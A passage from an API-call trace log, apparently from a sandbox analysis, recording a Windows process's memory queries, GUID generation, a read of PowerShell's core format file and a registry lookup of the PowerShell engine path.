	[0286.436] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.436] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.436] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.436] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x7bf73c7, Data2=0x3b98, Data3=0x4af6, Data4=([0]=0x95, [1]=0xb4, [2]=0xf, [3]=0x8, [4]=0xb8, [5]=0xeb, [6]=0xa8, [7]=0x9e))) returned 0x0
	[0286.436] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.437] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.437] VirtualQuery (in: lpAddress=0x26bb50, lpBuffer=0x26ca10, dwLength=0x30 | out: lpBuffer=0x26ca10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.437] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.437] VirtualQuery (in: lpAddress=0x26bb50, lpBuffer=0x26ca10, dwLength=0x30 | out: lpBuffer=0x26ca10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.437] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.437] VirtualQuery (in: lpAddress=0x26bb50, lpBuffer=0x26ca10, dwLength=0x30 | out: lpBuffer=0x26ca10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.438] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.438] VirtualQuery (in: lpAddress=0x26bb50, lpBuffer=0x26ca10, dwLength=0x30 | out: lpBuffer=0x26ca10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.438] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.438] VirtualQuery (in: lpAddress=0x26bb50, lpBuffer=0x26ca10, dwLength=0x30 | out: lpBuffer=0x26ca10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.438] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.438] VirtualQuery (in: lpAddress=0x26bb50, lpBuffer=0x26ca10, dwLength=0x30 | out: lpBuffer=0x26ca10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.439] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.439] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.439] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.439] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.439] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.439] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.439] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.439] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xde46aa00, Data2=0xe337, Data3=0x4032, Data4=([0]=0xbf, [1]=0x12, [2]=0xed, [3]=0x76, [4]=0x45, [5]=0xe9, [6]=0x6a, [7]=0x83))) returned 0x0
	[0286.440] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.440] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.440] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.440] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.440] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.440] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.441] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.441] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.441] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.441] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.441] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.441] VirtualQuery (in: lpAddress=0x26b780, lpBuffer=0x26c640, dwLength=0x30 | out: lpBuffer=0x26c640*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.441] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.442] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.442] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.442] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.442] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x6ab5ae81, Data2=0xcf7c, Data3=0x4105, Data4=([0]=0xa5, [1]=0x3a, [2]=0x7d, [3]=0x87, [4]=0xc, [5]=0x5b, [6]=0x48, [7]=0x89))) returned 0x0
	[0286.442] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xd1d7713d, Data2=0xf44c, Data3=0x4ded, Data4=([0]=0xbe, [1]=0x92, [2]=0xea, [3]=0xa7, [4]=0x2e, [5]=0xe4, [6]=0x42, [7]=0xeb))) returned 0x0
	[0286.442] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xdfe96bb3, Data2=0xf763, Data3=0x4de5, Data4=([0]=0xb9, [1]=0xf3, [2]=0xd2, [3]=0xeb, [4]=0x82, [5]=0x72, [6]=0xc5, [7]=0xbc))) returned 0x0
	[0286.443] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xc98f990a, Data2=0xba2f, Data3=0x4989, Data4=([0]=0xa8, [1]=0x91, [2]=0xf7, [3]=0xb4, [4]=0x6c, [5]=0x20, [6]=0x36, [7]=0x66))) returned 0x0
	[0286.444] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x91d3e04e, Data2=0x767b, Data3=0x47df, Data4=([0]=0x8f, [1]=0x84, [2]=0x61, [3]=0x14, [4]=0x10, [5]=0xc1, [6]=0xb1, [7]=0x75))) returned 0x0
	[0286.444] VirtualQuery (in: lpAddress=0x26b890, lpBuffer=0x26c750, dwLength=0x30 | out: lpBuffer=0x26c750*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.444] VirtualQuery (in: lpAddress=0x26b920, lpBuffer=0x26c7e0, dwLength=0x30 | out: lpBuffer=0x26c7e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.444] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xb75fe18f, Data2=0x4e45, Data3=0x4eb8, Data4=([0]=0x92, [1]=0x1a, [2]=0x56, [3]=0xf, [4]=0x87, [5]=0xb6, [6]=0xd2, [7]=0x9d))) returned 0x0
	[0286.444] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xa2d285e6, Data2=0xc36f, Data3=0x4c6a, Data4=([0]=0xb7, [1]=0xd0, [2]=0xa3, [3]=0xda, [4]=0x2c, [5]=0x73, [6]=0x2f, [7]=0xbc))) returned 0x0
	[0286.444] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xd20c0f6d, Data2=0xc4d4, Data3=0x4d2b, Data4=([0]=0xb9, [1]=0x5b, [2]=0x5f, [3]=0xd4, [4]=0xa6, [5]=0xf5, [6]=0x16, [7]=0x25))) returned 0x0
	[0286.445] SetErrorMode (uMode=0x1) returned 0x1
	[0286.445] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0286.445] SetErrorMode (uMode=0x1) returned 0x1
	[0286.445] GetFileType (hFile=0x32c) returned 0x1
	[0286.445] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.446] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.446] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.447] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.447] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.447] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.447] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.447] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.447] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.448] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.448] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.448] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.448] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.448] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.448] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.448] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.449] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.449] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.449] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.449] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0286.450] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0287.184] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0xe67, lpOverlapped=0x0) returned 1
	[0287.184] ReadFile (in: hFile=0x32c, lpBuffer=0x3129ff7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3129ff7*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0287.184] ReadFile (in: hFile=0x32c, lpBuffer=0x312aa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x312aa28*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0287.184] SetErrorMode (uMode=0x1) returned 0x1
	[0287.184] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d020 | out: lpFileInformation=0x26d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0287.184] SetErrorMode (uMode=0x1) returned 0x1
	[0287.185] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d108 | out: phkResult=0x26d108*=0x32c) returned 0x0
	[0287.185] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d08c, lpData=0x0, lpcbData=0x26d088*=0x0 | out: lpType=0x26d08c*=0x1, lpData=0x0, lpcbData=0x26d088*=0x56) returned 0x0
	[0287.185] CoTaskMemAlloc (cb=0x5a) returned 0x530d80
	[0287.185] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d05c, lpData=0x530d80, lpcbData=0x26d058*=0x56 | out: lpType=0x26d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d058*=0x56) returned 0x0
	[0287.185] CoTaskMemFree (pv=0x530d80) 
	[0287.185] RegCloseKey (hKey=0x32c) returned 0x0
	[0287.186] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x24c45fa4, Data2=0x30cb, Data3=0x4f5d, Data4=([0]=0xae, [1]=0x65, [2]=0x15, [3]=0x20, [4]=0x3c, [5]=0xce, [6]=0x57, [7]=0x26))) returned 0x0
	[0287.186] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xc5fa6f3, Data2=0xb75b, Data3=0x4634, Data4=([0]=0xab, [1]=0x4c, [2]=0xc6, [3]=0xce, [4]=0x17, [5]=0x78, [6]=0x9b, [7]=0x9b))) returned 0x0
	[0287.186] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x8026c14a, Data2=0xaabe, Data3=0x4f70, Data4=([0]=0x9c, [1]=0x15, [2]=0xe8, [3]=0xdd, [4]=0xc1, [5]=0x32, [6]=0xa9, [7]=0xd3))) returned 0x0
	[0287.186] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xd9a8732, Data2=0x4a22, Data3=0x41a7, Data4=([0]=0xa6, [1]=0x91, [2]=0x49, [3]=0x72, [4]=0x3e, [5]=0xc1, [6]=0x8a, [7]=0x94))) returned 0x0
	[0287.187] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x14a754d4, Data2=0x555a, Data3=0x4c2e, Data4=([0]=0x86, [1]=0xc6, [2]=0xed, [3]=0x20, [4]=0xe3, [5]=0x2f, [6]=0x8, [7]=0x84))) returned 0x0
	[0287.187] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x4f475107, Data2=0x78bb, Data3=0x4013, Data4=([0]=0x8f, [1]=0xdd, [2]=0xc0, [3]=0x4d, [4]=0x6, [5]=0x11, [6]=0x54, [7]=0x7c))) returned 0x0
	[0287.187] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xa323ef0, Data2=0x11fe, Data3=0x4152, Data4=([0]=0xa4, [1]=0x8c, [2]=0xeb, [3]=0xa6, [4]=0x60, [5]=0x5e, [6]=0xd5, [7]=0x1e))) returned 0x0
	[0287.187] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.187] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xab70d927, Data2=0x3809, Data3=0x4518, Data4=([0]=0xaf, [1]=0x9c, [2]=0x99, [3]=0xf8, [4]=0x5d, [5]=0xea, [6]=0xc2, [7]=0x17))) returned 0x0
	[0287.187] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xffa599f5, Data2=0xa0bf, Data3=0x42ea, Data4=([0]=0x9f, [1]=0x36, [2]=0x7c, [3]=0xd, [4]=0x54, [5]=0x58, [6]=0x18, [7]=0x7a))) returned 0x0
